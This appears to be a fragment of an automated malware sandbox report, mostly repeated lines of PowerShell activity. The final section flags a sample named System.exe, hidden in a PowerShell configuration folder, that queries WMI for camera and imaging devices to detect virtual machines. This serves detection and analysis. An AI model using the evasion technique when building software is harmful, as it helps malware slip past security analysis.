                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
